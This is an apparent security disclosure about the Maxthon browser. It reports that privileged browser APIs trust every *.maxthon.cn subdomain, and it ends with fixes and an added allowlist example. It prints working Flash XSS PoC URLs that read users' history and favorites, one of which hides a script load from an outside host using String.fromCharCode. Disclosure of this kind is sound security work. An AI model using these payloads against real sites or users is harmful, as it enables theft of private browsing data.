A design defect in Maxthon browser may allow sensitive information such as user favorites and history to be read.

Source: Internet
Author: User


A series of problems caused by design defects

For the sake of user experience, the browser allows *.maxthon.cn domains to call certain privileged APIs.

For example, to change the homepage:

maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.startpage", "http://wooyun.org");

Any *.maxthon.cn page can call the API above.

Plug-ins can also be installed through external.mxCall.

But is that really all? In fact, I found that, apart from i.maxthon.cn, any *.maxthon.cn domain can read the history; all that is needed is an XSS on the corresponding domain.

Of course, this is certainly not limited to history; favorites are readable too. Here I provide two PoC demos. I hope Maxthon will reconsider the API permissions in future versions, so that an XSS on any *.maxthon.cn domain cannot read sensitive information such as favorites and history.

Both XSSes are Flash-based XSS, so they are not blocked by the browser:

http://my.maxthon.cn//public/images/swfupload.swf?movieName=aaa%22])}catch(e){if(!window.x){window.x=1;alert(1)}};//

http://skin.maxthon.cn//swfupload/swfupload.swf?movieName=aaa%22])}catch(e){if(!window.x){window.x=1;alert(1)}};//

Read history PoC:
http://my.maxthon.cn//public/images/swfupload.swf?movieName=aaa%22])}catch(e){if(!window.x){window.x=1;alert(JSON.stringify(maxthon.browser.history.HistoryManager.getLastOpenList()));}};//



Read user favorites PoC:

// Iterate over the most-visited favorites and log each entry's URL
// (the loop condition was cut off in the original; it is restored as a bound on the node list).
var nodes = maxthon.browser.favorites.FavManager.getMostVisitNodes();
for (var i = 0; i < nodes.length; i++) {
    console.log(nodes[i].url_);
}

URL:

http://my.maxthon.cn//public/images/swfupload.swf?movieName=aaa%22])}catch(e){if(!window.x){window.x=1;eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,47,119,117,116,111,110,103,121,117,46,105,110,102,111,47,109,97,120,116,104,111,110,46,106,115);document.body.appendChild(window.s)')}};//



The effect is as follows:

[screenshots of the PoC results; images not preserved in this copy]
Solution:

Fix the XSS: the swfupload.swf here can be replaced with the one at http://bbs.open.qq.com/static/image/common/swfupload.swf to fix the XSS.

Adjust the policy so that an XSS on any sub-site cannot affect users' favorites, history and other sensitive information.
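As an added illustration of the second fix (example code, not Maxthon's own), here is a per-API allowlist of exact origins shown beside the wildcard-subdomain check the report describes. The API names come from the PoCs above; the origins, the https-only rule and the choice of i.maxthon.cn as the only intended caller are assumptions for the example.

```javascript
// Added example, not Maxthon's code: a per-API allowlist of exact origins,
// beside the wildcard-subdomain policy the report describes. The origins
// and the choice of i.maxthon.cn as sole intended caller are assumptions.

// Weak policy from the report: every host under maxthon.cn gets every
// privileged API, so an XSS on any subdomain inherits the whole set.
function isPrivilegedWildcard(origin) {
  var host = new URL(origin).hostname;
  return host === "maxthon.cn" || host.endsWith(".maxthon.cn");
}

// Stronger policy: each privileged API lists the full origins
// (scheme + host + port) that may call it. No suffix matching, and
// plain http:// origins are never trusted.
var API_ALLOWLIST = {
  "maxthon.browser.config.ConfigManager.set": ["https://i.maxthon.cn"],
  "maxthon.browser.history.HistoryManager.getLastOpenList": ["https://i.maxthon.cn"],
  "maxthon.browser.favorites.FavManager.getMostVisitNodes": ["https://i.maxthon.cn"]
};

function isAllowed(api, origin) {
  var allowed = API_ALLOWLIST[api];
  if (!allowed) return false;            // unknown API: deny by default
  var parsed;
  try { parsed = new URL(origin); } catch (e) { return false; }
  if (parsed.protocol !== "https:") return false;
  return allowed.indexOf(parsed.origin) !== -1;   // exact origin match only
}

// Gate in front of the privileged implementation: refuse, do not expose.
function callPrivileged(api, origin, impl) {
  if (!isAllowed(api, origin)) {
    throw new Error("privileged API " + api + " denied for origin " + origin);
  }
  return impl();
}

// Constructed history list standing in for the real HistoryManager.
function demo() {
  var history = ["https://example.test/a", "https://example.test/b"];
  var api = "maxthon.browser.history.HistoryManager.getLastOpenList";
  return {
    wildcardGrantsSubdomain: isPrivilegedWildcard("http://my.maxthon.cn"),
    allowlistDeniesSubdomain: !isAllowed(api, "https://my.maxthon.cn"),
    allowlistDeniesLookalike: !isAllowed(api, "https://evilmaxthon.cn"),
    entriesForIntendedCaller: callPrivileged(api, "https://i.maxthon.cn",
      function () { return history.slice(); }).length
  };
}
```

Under the wildcard check a subdomain XSS such as my.maxthon.cn is granted everything, whereas the allowlist denies it, denies look-alike hosts, and only returns data to the exact intended origin.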
